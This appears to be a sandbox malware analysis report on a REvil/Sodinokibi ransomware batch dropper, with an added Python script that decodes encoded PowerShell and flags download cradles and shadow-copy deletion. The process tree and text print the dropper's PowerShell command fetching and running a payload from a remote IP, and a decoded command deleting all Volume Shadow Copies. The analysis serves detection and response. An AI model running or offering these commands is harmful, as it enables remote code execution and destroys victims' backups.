Analysis

  • max time kernel
    115s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7v191014
  • submitted
    10-02-2020 21:10

General

  • Target

    4jD1biG2.bat

  • Size

    191B

  • MD5

    6097db04a430a1a65515bae911e13c6e

  • SHA1

    41f39ba8f63c6ff8067348f596155beb32c45f17

  • SHA256

    5743310e1c2bd52d3abf50fa874a206e42a4aac4e182447e99f3cf32be4334ed

  • SHA512

    22fd4f652757e39fca2fa7b8a5d51cf951b76b200764b0ad45aa01cd38f9cbfb63df5542f08606fc198857cdecf1e4fd14d1cd005805203469b9dbb9a52ed777

Malware Config

Extracted

  • Language
    ps1
  • Source
    URLs
  • ps1.dropper
    http://185.103.242.78/pastes/4jD1biG2

Extracted

  • Language
    ps1
  • Source

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality

  • Modifies service 2 TTPs 4 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Drops file in Program Files directory 33 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Discovering connected drives 3 TTPs 7 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\4jD1biG2.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Discovering connected drives
    PID:1216
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/4jD1biG2');Invoke-PBEESOQZ;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Drops file in Program Files directory
      • Sets desktop wallpaper using registry
      • Suspicious use of WriteProcessMemory
      • Blacklisted process makes network request
      • Discovering connected drives
      PID:1312
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        • Discovering connected drives
        PID:1536
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1352
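The process tree above shows the two behaviours a responder would key on: the powershell.exe download cradle that fetches the second stage from the paste URL with IEX and DownloadString, and the child powershell.exe started with -e, whose argument is a base64-wrapped UTF-16LE command that deletes every Volume Shadow Copy through WMI (which is why vssvc.exe shows up in the tree). The script below is an added example and not part of the Triage report: it decodes -EncodedCommand arguments and tags both behaviours, run over the two command lines copied from the tree. The indicator names and helper functions are this example's own, not Triage signature names.

```python
"""
Decode PowerShell -EncodedCommand arguments and tag the two behaviours seen in
this report: a remote download cradle and Volume Shadow Copy deletion.

Added example, not part of the Triage report. The two command lines below are
copied from the process tree; everything else is this example's own choice.
"""
import base64
import binascii
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the
# spellings most often seen. The argument is base64 over UTF-16LE text.
ENCODED_FLAG = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)"
)


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a -EncodedCommand argument, or None if absent/invalid."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None  # not well-formed base64: leave it to a human
    try:
        # -EncodedCommand is always UTF-16LE, regardless of console code page.
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return None


# Indicators are matched against the visible command line plus the decoded
# payload, so an encoded shadow-copy wipe is caught as well as a plain one.
INDICATORS = {
    "download_cradle": re.compile(
        r"(?=.*(?:\bIEX\b|Invoke-Expression))"
        r"(?=.*(?:DownloadString|DownloadFile|DownloadData|Net\.WebClient))",
        re.I | re.S,
    ),
    "shadow_copy_deletion": re.compile(
        r"(?:(?=.*Win32_Shadowcopy)(?=.*\.Delete\(\))"
        r"|vssadmin(?:\.exe)?\s+delete\s+shadows"
        r"|wmic(?:\.exe)?\s+shadowcopy\s+delete)",
        re.I | re.S,
    ),
    "encoded_command": ENCODED_FLAG,
}


def classify(cmdline: str) -> dict:
    """Return the decoded payload (if any) and the sorted list of matching tags."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline if decoded is None else cmdline + "\n" + decoded
    tags = sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))
    return {"decoded": decoded, "tags": tags}


# Constructed sample input: the two PowerShell command lines from the tree above.
CRADLE_CMDLINE = (
    "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe "
    "\"IEX (New-Object System.Net.WebClient).DownloadString("
    "'http://185.103.242.78/pastes/4jD1biG2');Invoke-PBEESOQZ;Start-Sleep -s 10000\""
)
ENCODED_CMDLINE = (
    "powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQA"
    "bwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBE"
    "AGUAbABlAHQAZQAoACkAOwB9AA=="
)

if __name__ == "__main__":
    for line in (CRADLE_CMDLINE, ENCODED_CMDLINE):
        result = classify(line)
        print("tags   :", ", ".join(result["tags"]) or "-")
        print("decoded:", result["decoded"] or "-")
        print()
```

The -e argument decodes to `Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}`, the WMI equivalent of `vssadmin delete shadows /all`; each `.Delete()` call is serviced by the Volume Shadow Copy service, which is the vssvc.exe process in the tree. The regex only covers the common spellings of the flag; a full implementation would mirror PowerShell's prefix matching, and any base64 that fails to decode should be surfaced rather than silently dropped.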

Network

MITRE ATT&CK Enterprise v6


Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4628e689-d195-4873-bc54-2194d7d68777

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_512b5fbe-a222-4c41-85f8-7f61ee5ca5bd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c6be20a0-2b44-41e6-b03e-788e1380648b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c85534f7-abc2-478b-a265-18e03f17967d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_eb154db7-5347-459d-a5ae-f27e0827e401

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef13c2a6-fcdf-474f-b686-be9a419bd5e9

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms